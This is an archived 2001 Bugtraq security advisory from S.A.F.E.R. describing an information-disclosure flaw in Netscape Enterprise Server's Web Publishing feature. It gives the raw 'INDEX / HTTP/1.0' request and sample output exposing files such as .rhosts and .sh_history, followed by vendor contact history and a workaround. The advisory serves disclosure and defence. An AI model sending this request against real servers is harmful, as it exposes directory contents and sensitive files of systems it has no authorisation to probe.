From security@RELAYGROUP.COM Wed Jan 24 21:55:51 2001 From: Security Research Team To: BUGTRAQ@SECURITYFOCUS.COM Date: Wed, 24 Jan 2001 22:41:24 +0700 Subject: [BUGTRAQ] [SAFER] Security Bulletin 010124.EXP.1.11 __________________________________________________________ S.A.F.E.R. Security Bulletin 010124.EXP.1.11 __________________________________________________________ TITLE : Netscape Enterprise Server - INDEX request problem DATE : January 24, 2001 NATURE : Information gathering AFFECTED : Netscape Enterprise Server 3.x and 4.x with Web Publishing enabled PROBLEM: Problems exists that allows remote user to obtain directory listings on remote site running Web Publishing. DETAILS: It is possible to obtain directory listing on the remote web server by issuing command: INDEX / HTTP/1.0 Output looks like: -- output start -- Trying 192.168.1.1... Connected to www.example.org. Escape character is '^]'. INDEX / HTTP/1.0 HTTP/1.1 200 OK Server: Netscape-Enterprise/3.6 SP2 Date: Fri, 19 Jan 2001 12:37:26 GMT Content-type: text/plain test directory 512 979859452 0 null null contact directory 512 979701766 0 null null index.html text/html 1467 979701461 268 null null mobile directory 512 979701775 0 null null service directory 512 979701801 0 null null .rhosts unknown 22 965727716 264 null null search directory 512 931316908 0 null null .sh_history unknown 1256 979723453 264 null null corporate directory 512 972989267 0 null null .cshrc unknown 418 975657629 264 null null .login unknown 674 975657629 264 null null .profile unknown 416 975657629 264 null null -- output end -- INDEX request will not work on 'aliased' directories (like CGI directories and similar). FIXES: Netscape has been contacted on multiple occasions. First time, more than a year ago. Although other problems we have reported have been fixed, we have received no response for this issue - to date. Workaround is to disable Web Publishing, or disable INDEX request (which will, most likely, break web publishing feature). CREDITS: Emmanuel Gadaix Vanja Hrustic Fyodor Yarochkin This advisory is also available at http://www.safermag.com/advisories/ __________________________________________________________ S.A.F.E.R. - Security Alert For Enterprise Resources Copyright (c) 2001 The Relay Group http://www.safermag.com ---- security@relaygroup.com __________________________________________________________